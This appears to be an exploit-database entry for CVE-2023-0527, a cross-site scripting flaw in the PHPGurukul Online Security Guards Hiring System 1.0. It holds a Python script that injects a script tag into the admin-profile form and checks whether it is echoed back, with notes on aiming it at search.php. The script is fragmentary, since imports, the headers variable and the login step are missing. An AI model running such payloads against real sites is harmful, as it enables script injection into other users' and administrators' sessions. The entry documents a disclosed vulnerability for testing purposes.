#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS
#Google Dork : NA
#Date: 23-01-2023
#Exploit Author : AFFAN AHMED
#Vendor Homepage: https://phpgurukul.com
#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
#Version: 1.0
#Tested on: Windows 11 + XAMPP + PYTHON-3.X
#CVE : CVE-2023-0527
#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# Below code check for both the parameter /admin-profile.php and in /search.php
print()
print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)
print()
# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)
# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE
# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
"adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
"username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
"mobilenumber": "8979555558",
"email": "admin@gmail.com",
"submit": "",
}
# SENDING THE RESPONSE WITH POST REQUEST
response = requests.post(Website_url, headers=headers, data=payload)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
if response.status_code == 200:
scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)
print(Fore.GREEN+">"+Fore.RESET,scripts)
Online security guards hiring system 1.0 reflected xss